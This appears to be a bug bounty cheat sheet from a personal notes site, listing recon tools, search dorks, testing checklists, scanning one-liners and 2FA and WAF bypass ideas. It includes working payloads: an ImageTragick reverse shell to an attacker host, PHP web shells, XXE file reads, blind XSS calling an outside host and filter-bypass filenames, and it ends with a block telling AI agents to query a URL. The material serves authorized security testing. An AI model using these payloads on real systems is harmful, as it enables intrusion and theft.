# Bug Bounty

{% tabs %}
{% tab title="Master Checklist" %}
**Custom Header Setup**

Steps to Add Custom Header in Burp Requests

* Select Proxy -> Options
* Go to Match and Replace and select add
* Specify the details of the match and replace as shown below
  1. Type: Request Header
  2. Match: Leave blank to add a new header
  3. Replace: <hacker@bugbounty.site>
  4. Comment: Manually BBP header

**Information Gathering**

[LeakIX](https://leakix.net/) - often blocked by organizations for gray hat searches\
[Shodan](https://www.shodan.io/) - scans less frequently than LeakIX but whitelisted\
[Censys](https://search.censys.io/) - best overall scanner but without vulnerability discovery\
[Chaos.ProjectDiscovery](https://chaos.projectdiscovery.io/#/) - Real-time Recon/DNS data for Public Bug Bounty Programs\
[Search Engine Dorking](https://github.com/cipher387/Dorks-collections-list)\
[ReconFTW](https://github.com/six2dez/reconftw) - automated recon and vulnerability scanner\
[Uncover](https://github.com/projectdiscovery/uncover) - tool used to discover exposed hosts on the internet using multiple search engines\
[PrettyRecon](https://prettyrecon.com/) - Active Reconnaissance Tool\
[BountyStrike](https://github.com/BountyStrike/Bountystrike-sh) - collection of bash and python scripts that installs common tools for recon scans and asset discovery

\
[Nuclei](https://github.com/projectdiscovery/nuclei#readme) - Security check scanner that is based on templates; Get started with Nuclei [here](https://nuclei.projectdiscovery.io/nuclei/get-started/#running-nuclei)\
[Nuclei Templates Directory](https://nuclei-templates.netlify.app/) - Visually navigate available nuclei templates\
[Community edition nuclei templates (CENT)](https://github.com/xm1k3/cent) - collect and organize other custom templates

\
Getting started with some CVE scanning using Nuclei templates:

```bash
nuclei -target "https://site.com" -t cves
```

```bash
nuclei -target "https://site.com" -t /path/to/nuclei-templates/cves
```

```bash
nuclei -target "https://site.com" -t cves -rl
```

Mass security testing on subdomains:

```bash
cat site subdomains.txt | nuclei -t /path/to/nuclei-templates/
```

```bash
nuclei -t /path/to/nuclei-templates/ -l urls.txt
```

`-rl`, -rate-limit int maximum number of requests to send per second (default 150)

`-rlm`, -rate-limit-minute int maximum number of requests to send per minute

Combining nuclei scanner with CENT custom templates

```bash
nuclei -u https://example.com -t ./cent-nuclei-templates -tags cve
```

```bash
nuclei -l urls.txt -t ./cent-nuclei-templates -tags cve
```

\
Daily updated Text file of all domains within scope on active Bug Bounty Programs\
<https://github.com/arkadiyt/bounty-targets-data/blob/main/data/domains.txt>

<table><thead><tr><th width="413">Google Dork</th><th>Purpose</th></tr></thead><tbody><tr><td><code>intitle:"index of /.git/"</code></td><td>Searching for Directories</td></tr><tr><td><code>allintext:index filetype:git</code></td><td>Search for extensions</td></tr><tr><td><code>inurl:"index.php?id="</code></td><td>Searching for PHP pages</td></tr><tr><td><code>inurl:"admin/dashboard.php" site:.com</code></td><td>Searching for PHP admin dashboards</td></tr><tr><td><code>Intitle: "login" "admin" site:http://site.com</code></td><td>Searching for admin login pages</td></tr><tr><td><code>intitle:"Index of /" .htaccess site:http://site.com</code></td><td>Searching for exposed Apache configuration file</td></tr><tr><td><code>site:website.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contcat_us" | inurl:"contact_form" | inurl:"contact-form"</code></td><td>Searching for possible contact form</td></tr><tr><td><code>inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:&#x26; site:example[.]com</code></td><td>SSRF Prone Parameters</td></tr><tr><td></td><td></td></tr></tbody></table>

| Shodan Dork                              | Purpose                                                                                                     |
| ---------------------------------------- | ----------------------------------------------------------------------------------------------------------- |
| `hostname:".gov" product:"Jenkins" 200`  | Searching Jenkins instances in .gov                                                                         |
| `ssl.cert.subject.CN:"*.google.com"+200` | Returns all SSL services that has issued a certificate for \*.google.com with an HTTP response code of 200. |
| ssl.cert.issuer.cn:"DOD SW CA-60" 200    | Returns all SSL certificates that have been issued by the DoD with response code of 200                     |

**Sensitive Information Exposure methods Use** [**GitTools**](https://github.com/internetwache/GitTools) **gitdumper.sh or** [**gittyleaks**](https://github.com/kootenpv/gittyleaks)

* [ ] `gitdumper.sh http://IPorURL/.git git`

**Defense Evasion**

Attempt to bypass application protections such as Cloudflare, Akamai, etc.

Worth a shot to use the tool by [Cloudflare Origin IP](https://github.com/gwen001/cloudflare-origin-ip) by @[gwen001](https://github.com/gwen001)

Check to see if application is behind a WAF

```bash
wafw00f $URL
whatwaf -u $URL
nmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL
```

**Authentication:**

Registration

* Input validation
  * [ ] Space manipulation & Using Dots & Case sensivity check
  * [ ] Checking allowed characters (`<> " '`)
  * [ ] Register using `myemail%00@email.com` or (%0d, %0a)
  * [ ] Register using `myemail@target.com`
    * Response manipulate from `401 Unauthorized` to `200 Ok` or `302 Found`
* Analysis
  * [ ] Check `.js` file on the page, such as `login.js`
  * [ ] Check the parameters used on the endpoint
    * Might be listed in the `source` or `js`
  * [ ] Checking the Mobile Endpoint
    * Does it have the same protection as webapp?
    * How does it treat Unicode characters?
  * [ ] Google Dorks
    * `site:example.com inurl:register inurl:&`
    * `site:example.com inurl:signup inurl:&`
    * `site:example.com inurl:join inurl:&`
* Misc
  * [ ] Email Takeover
    * Register an Email, before confirming, change the email. check if the new confirmation email is sent to the first registered email.
* Password reset process
  * Password reset tokens (expiration/reuse)
* Failed retry lockout (DoS)
* Password policies
* Update profile information without asking password
* Default or easy to guess keys
* User enumeration
* HTTP Authentication
* Authentication Bypass
* Identify weak authentication channels (Find primary mechanism and identify secondary mechanicsm / methods \[Mobile App, Call Center, SSO])

**Authorization:**

* [ ] Testing Directory traversal/file inclusion
* [ ] Access to features, functionality or data that should not be available for the current role (privilege escalation, horizontal & vertical, Example: Access admin functionality from a user account without privileges (create, delete, modify users...)
* [ ] IDORs

  Example: The following URL returns our profile: target.com/profile?idUser=123 Cambiar por target.com/profile?idUser=12**4** Do you have access? Should this profile be accessible to our current user?

**Session:**

* [ ] No cookie validation
* [ ] Not setting a new cookie (session fixation - logout -> Login again)
* [ ] Cookieis easy to reverse engineer (base64/Hash ID)
* [ ] Are security options set? (secure/HttpOnly)

  HttpOnly not set? is there an XSS? \<script>alert(document.cookie)\</script>
* [ ] Testing for **C**ross **S**ite **R**equest **F**orgery

  Delete token (parameter y header) Forge your own token Use a second identical CSRF parameter Change POST to GET (or reverse, put, etc)

  Features that should be tested: . Add / Upload file · Change Email · Delete files · Change Password · Transfer money · Edit profile
* [ ] Logout

  Are you actually logged out? (Session is destroyed)
* [ ] Session timeout

  Does the session expire after a reasonable amount of time?
* [ ] JWT

  Signature check Check claims (Especially: **aud** -> "In practical use, this tends to be the "client id" or "client key" of the application that the JWT is intended to be used by."") Signature algorithm Sensitive information in the token How is it revoked? How is it used? How is it processed?

  * [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)

    Brute force, example: ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
  * [jwt\_tool](https://github.com/ticarpi/jwt_tool)

    Check various vulns, crack with dictionary Example: python3 jwt\_tool.py
  * [JWT2John](https://raw.githubusercontent.com/Sjord/jwtcrack/master/jwt2john.py)

  Convert JWT to a format crackable by John python3 [jwt2john.py](http://jwt2john.py/)

  Execute John: ./john /tmp/token.txt —wordlist=wordlist.txt

**General:**

* [ ] Test HTTP Methods
* [ ] Header Injections

  X-Forwarded-Host: xxxx.com X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Originating-IP: 127.0.0.1
* [ ] Test CORS
* [ ] S3 AWS

  * [lazys3](https://github.com/nahamsec/lazys3)
  * [AWS Cli](https://aws.amazon.com/es/cli/)

  [http://bucket.s3.amazonaws.com](http://bucket.s3.amazonaws.com/) / <http://s3.amazonaws.com/bucket> aws s3 cp test.txt s3://target --no-sign-request aws s3 ls s3://target --no-sign-request

  * [Metadata Cloud](https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b)
  * [How the AWS Access Key & Secret works](https://github.com/streaak/keyhacks#AWS-Access-Key-ID-and-Secret)\*\*\*\*

**File Upload:**

* Extensions Impact
  * `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE
  * `SVG`: Stored XSS, SSRF, XXE
  * `GIF`: Stored XSS, SSRF
  * `CSV`: CSV injection
  * `XML`: XXE
  * `AVI`: LFI, SSRF
  * `HTML`, `JS` : HTML injection, XSS, Open redirect
  * `PNG`, `JPEG`: Pixel flood attack (DoS)
  * `ZIP`: RCE via LFI, DoS
  * `PDF`, `PPTX`: SSRF, BLIND XXE
* Blacklisting Bypass
  * PHP → `.phtm`, `phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc`
  * ASP → `asp`, `.aspx`, `.cer`, `.asa`
  * Jsp → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
  * Coldfusion → `.cfm`, `.cfml`, `.cfc`, `.dbm`
  * Using random capitalization → `.pHp`, `.pHP5`, `.PhAr`
* Whitelisting Bypass
  * `file.jpg.php`
  * `file.php.jpg`
  * `file.php.blah123jpg`
  * `file.php%00.jpg`
  * `file.php\x00.jpg` this can be done while uploading the file too, name it `file.phpD.jpg` and change the D (44) in hex to 00.
  * `file.php%00`
  * `file.php%20`
  * `file.php%0d%0a.jpg`
  * `file.php.....`
  * `file.php/`
  * `file.php.\`
  * `file.php#.png`
  * `file.`
  * `.html`

#### **Vulnerabilities**

* [ ] Directory Traversal
  * Set filename `../../etc/passwd/logo.png`
  * Set filename `../../../logo.png` as it might changed the website logo.
* [ ] SQL Injection
  * Set filename `'sleep(10).jpg`.
  * Set filename `sleep(10)-- -.jpg`.
* [ ] Command Injection
  * Set filename `; sleep 10;`
* [ ] SSRF

  * Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor.
  * SSRF Through `.svg` file.

  ```php
  <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="https://attacker.com/picture.jpg" /></svg>
  ```
* [ ] ImageTragic

  ```
  push graphic-context
  viewbox 0 0 640 480
  fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
  pop graphic-context
  ```
* [ ] XXE

  * Upload using `.svg` file

  ```xml
  <?xml version="1.0" standalone="yes"?>
  <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
  <svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
     <text font-size="40" x="0" y="16">&xxe;</text>
  </svg>
  ```

  ```xml
  <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
      <image xlink:href="expect://ls"></image>
  </svg>
  ```

  * Using excel file

#### XSS

* [ ] Set file name `filename="svg onload=alert(document.domain)>"` , `filename="58832_300x300.jpg<svg onload=confirm()>"`
* [ ] Upload using `.gif` file

```
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
```

* [ ] Upload using .svg file

```xml
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
```

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>


```

* [Swagger UI XSS](https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/)

#### **Open Redirect**

* [ ] Upload using `.svg` file

```xml
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
```

* [ ] Content-ish Bypass
  * [ ] Content-type validation
    * Upload `file.php` and change the `Content-type: application/x-php` or `Content-Type : application/octet-stream` to `Content-type: image/png` or `Content-type: image/gif` or `Content-type: image/jpg`.
  * [ ] Content-Length validation

    * Small PHP Shell

    ```php
    (<?=`$_GET[x]`?>)
    ```
  * [ ] Content Bypass Shell

    * If they check the Content. Add the text "GIF89a;" before you shell-code. ( `Content-type: image/gif` )

    ```php
    GIF89a; <?php system($_GET['cmd']); ?>
    ```
* [ ] Misc
  * [ ] Uploading `file.js` & `file.config` (web.config)
  * [ ] Pixel flood attack using image
  * [ ] DoS with a large values name: `1234...99.png`
  * [ ] Zip Slip
    * If a site accepts `.zip` file, upload `.php` and compress it into `.zip` and upload it. Now visit, `site.com/path?page=zip://path/file.zip%23rce.php`
  * [ ] Image Shell

    * Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file `mv pic.jpg pic.php.jpg`

    ```php
    exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' pic.jpg
    ```

**Adobe Experience Manager (AEM) Configuration Testing**

Shodan Dork:

`http.component:"Adobe Experience Manager"`

Resources\
[AEM Hacker Tool](https://github.com/0ang3el/aem-hacker)\
[SlideShare presentation on AEM by 0ang3el](https://www.slideshare.net/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs)

#### Reporting

[CVSS 3.1 Calculator](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
{% endtab %}

{% tab title="One-Liners" %}

### Recon

**Dump In-scope Assets from BBPs using repo from** [**@arkadiyt**](https://github.com/arkadiyt/bounty-targets-data)

**HackerOne Programs**

```bash
curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackerone_data.json | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
```

**BugCrowd Programs**

```bash
curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
```

**Intigriti Programs**

```bash
curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
```

**YesWeHack Programs**

```bash
curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
```

**HackenProof Programs**

```bash
curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
```

**Federacy Programs**

```bash
curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
```

Dump list of all BBP Domains that are in scope and identify those without dns names (ips.txt)

{% code overflow="wrap" %}

```
curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/domains.txt > domains.txt && grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' domains.txt > ips.txt
```

{% endcode %}

**Martian Grip**

from [@notnci](https://gist.github.com/notnci/e65f9d1a167909f1a3f352aded53998b) with beginner explanation

{% code overflow="wrap" %}

```
shodan download testing 'cloud.region:"us-east-1" 200 product:"Elastic" port:8001'; shodan parse --fields ip_str,port testing.json.gz | tee testing_parsed.out | awk '{print$1":"$2}' | httpx -silent -o testing_httpx.out | nuclei -as -silent -o testing_nuclei.out; cat testing_nuclei.out | awk -F " " '{print $6}' | grip | uniq -u | tee testing_vuln_ips.out | nrich - | tee testing_nrich.out
```

{% endcode %}

* The `shodan download` command is attempting to search for devices in the US East (N. Virginia) region that have a product named "Elastic" and are listening on port 8001. The `parse` command is used to extract certain fields (in this case, `ip_str` and `port`) from the results of the search, which are stored in the file `testing.json.gz`.
* `httpx` is a tool that can be used to perform HTTP requests and analyze the response. In this case, the command is using the `-silent` flag to suppress output and the `-o` flag to write the response to a file called `testing_httpx.out`. The input for this command appears to be the list of IP addresses and ports extracted from the Shodan search results.
* \`\`[`nuclei`](https://github.com/projectdiscovery/nuclei) is a tool for detecting vulnerabilities and misconfigurations in web applications. The `-as` flag stands for "active scan", which means that the tool will perform various types of requests to the target web application in order to identify potential vulnerabilities. The `-silent` flag suppresses output, and the `-o` flag specifies an output file for the results. The input for this command is the list of IP addresses and ports extracted from the Shodan search results.
* `awk` is a tool for processing text files. The command appears to be extracting the sixth field (`$6`) from the output of the `nuclei` command, which is piped (`|`) to the `grip` command.
* `grip` is a command line tool for rendering local readme files before sending them to GitHub. In this case, it is used to render the output of the `awk` command, which is then passed to `uniq` with the `-u` flag to remove duplicate lines. The resulting list of unique lines is written to the file `testing_vuln_ips.out`.
* [`nrich`](https://gitlab.com/shodan-public/nrich) is a tool for performing OSINT (Open Source Intelligence) on IP addresses. The input for this command appears to be the list of IP addresses and ports extracted from the Shodan search results, and the `-` flag tells the tool to read the input from standard input (stdin). The results are written to the file `testing_nrich.out`.

**Find SQLi at scale**

`# collect target urls`\
``\ `subfinder -d site.com -silent - all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a urls`\``\
`# filter potential SQLi Url`\
`cat urls | gf sqli | tee -a sqli`\
\`\`\
`# run test`\
`while read line; do sqlmap -u $line --parse-errors --curent-db --invalid-logical --invalid-bignum --invalid-string --risk 3; done < sqli`

**Local File Inclusion**

```bash
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
```

**Open-redirect**

```bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
```

```bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
```

**XSS**

```bash
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
```

**𝘽𝙡𝙞𝙣𝙙 𝙓𝙎𝙎 𝙈𝙖𝙨𝙨 𝙃𝙪𝙣𝙩𝙞𝙣𝙜**

```
cat domains.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"
```

**Unauthenticated Blind SSRF via xmlrpc.php**

```
cat iplist| httpx -silent -path /xmlrpc.php -title -match-string "XML-RPC"
```

**Find JavaScript Files**

```bash
assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done
```

**Extract Endpoints from JavaScript**

```bash
cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
```

**Get CIDR & Org Information from Target Lists**

```bash
for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done
```

### **Finding Subdomains**

**Get Subdomains from RapidDNS.io**

```bash
curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
```

**Get Subdomains from BufferOver.run**

```bash
curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
```

```bash
export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"
```

**Get Subdomains from Riddler.io**

```bash
curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 
```

**Get Subdomains from VirusTotal**

```bash
curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```

**Get Subdomain with cyberxplore**

```
curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 
```

**Get Subdomains from CertSpotter**

```bash
curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 
```

**Get Subdomains from Archive**

```bash
curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
```

**Get Subdomains from JLDC**

```bash
curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```

**Get Subdomains from securitytrails**

```bash
curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u
```

**Bruteforcing Subdomain using DNS Over**

```
while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt
```

**Get Subdomains With sonar.omnisint.io**

```
curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 
```

**Get Subdomains With synapsint.com**

```
curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 
```

**Get Subdomains from crt.sh**

```bash
curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```

**Sort & Tested Domains from Recon.dev**

```bash
curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent
```

**Discover subdomains and enumerate API endpoints discovered with subfinder**

```
subfinder -d host.com -silent -all | httpx -silent -o host.txt; for i in $(cat host_httpx.txt); do DOMAIN=$(echo $i | unfurl format %d); ffuf -u $i/FUZZ -w common-api-endpoints.txt -o ${DOMAIN]_ffuf.txt; done
```

**Subdomain Bruteforcer with FFUF**

```bash
ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'
```

**Find Allocated IP Ranges for ASN from IP Address**

```bash
whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
```

**Extract IPs from a File**

```bash
grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
```

**CVE 2022-1040 (Give your domain without http/https on the "sophos\_servers" file)**

```
cat sophos_servers | while read host do; do curl --connect-timeout 10 -ks -H "X-Requested-With: XMLHttpRequest" -X POST "https://$host/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"👽":"TEST"\}" | grep -q 'Session Expired' && printf "$host \033[1;41mVulnerable [ Sophos RCE ]\e[0m\n"; done;
```

### General

**Use grep 𝐭𝐨 𝗘𝘅𝘁𝗿𝗮𝗰𝘁 𝗨𝗥𝗟'𝘀 𝗳𝗿𝗼𝗺 𝗷𝘂𝗻𝗸 𝗱𝗮𝘁𝗮**

* From a local file

```
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
```

* From an online resource

```
curl http://site.xxx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
```

{% endtab %}

{% tab title="2FA Bypass" %}
**Techniques/Checklist**

**JS File Analysis**

* [ ] Analyze all the JS Files that are referred in the response to see if any JS file contains information that can help bypass 2FA code

**2FA Code Leakage in Response**

* [ ] You can intercept otp using burpsuite and inspect http response and check if the 2FA code leaked

**Lack of brute-Force Protection**

* [ ] Type 2FA code and capture request using burpsuite
* [ ] Send request to intruder and send request for 100–200 times
* [ ] At 2FA Code Verification page, try to brute-force for valid 2FA and see if there is any success

**2FA Refer Check Bypass**

* [ ] Navigate to the page which comes after 2FA or any other authenticated page of the application. If this not successful, change the refer header to the 2FA page URL

**Missing 2FA Code Integrity Validation**

* [ ] Request a 2FA code from the attacker’s account
* [ ] Use this valid 2FA code in the victim 2FA Request and see if it bypasses the 2FA protection

**Enabling 2FA Doesn’t Expire Previous Session**

* [ ] If a bug hunter hijacks an active session before 2FA, it is possible to carry out all functions without a need for 2FA

**Clickjacking on 2FA Disable Feature**

* [ ] Try to iframe the page where the application allows a user to disable 2FA

**Response Manipulation**

* [ ] Observe response of the 2FA Request
* [ ] If receiving “Success”:false, change this to “Success”:true and see if it bypasses the 2FA

**Status Code Manipulation**

* [ ] If the Response Status Code is 4xx like 401, 402 then change the response Status Code to “200 OK” and see if it bypasses the 2FA

**2FA Code Reusability**

* [ ] Request a 2FA code and use it
* [ ] Re-use the same 2FA code in another session and if it authenticated successfully, that’s a potential issue

**CSRF on 2FA Disable Feature**

* [ ] Navigate to 2FA Page and click on “Disable 2FA” and capture this request with Burp Suite & generate a CSRF PoC
* [ ] Send this PoC to the victim, and check if CSRF happens successfully and remove the 2FA from the victim account
  {% endtab %}

{% tab title="WAF Bypass Methods" %}
**CloudFront**

Bypassing Cloudfront XSS WAF

1. alert = window\["al"+"ert"]
2. bypass () with \`\`
3. replace space with /
4. encode symbols:
   * [ ] `<` = `%3c`
   * [ ] `>` = `%3e`
   * [ ] `"` = `%22`
   * [ ] `[` = `%5b`
   * [ ] `]` = `%5d`
   * [ ] `` ` `` = `%60`
     {% endtab %}

{% tab title="Interesting Web Paths/Parameters" %}
**Remote Code Execution Parameters**\
?cmd={payload}\
?exec={payload}\
?command={payload}\
?execute{payload}\
?ping={payload}\
?query={payload}\
?jump={payload}\
?code={payload}\
?reg={payload}\
?do={payload}\
?func={payload}\
?arg={payload}\
?option={payload}\
?load={payload}\
?process={payload}\
?step={payload}\
?read={payload}\
?function={payload}\
?req={payload}\
?feature={payload}\
?exe={payload}\
?module={payload}\
?payload={payload}\
?run={payload}\
?print={payload}\
?cmd={payload}\
?exec={payload}\
?command={payload}\
?execute={payload}\
?ping={payload}\
?query={payload}\
?jump={payload}\
?code={payload}\
?reg={payload}\
?do={payload}\
?func={payload}\
?arg={payload}\
?option={payload}\
?load={payload}\
?process={payload}\
?step={payload}\
?read={payload}\
?function={payload}\
?req={payload}\
?feature={payload}\
?exe={payload}\
?module={payload}\
?payload={payload}\
?run={payload}\
?print={payload}

**Git**

/.git

/.gitkeep

/.git-rewrite

/.gitreview

/.git/HEAD

/.gitconfig

/.git/index

/.git/logs

/.svnignore

/.gitattributes

/.gitmodules

/.svn/entries
{% endtab %}
{% endtabs %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://martian1337.gitbook.io/notes/notes/security-research/bug-bounty.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.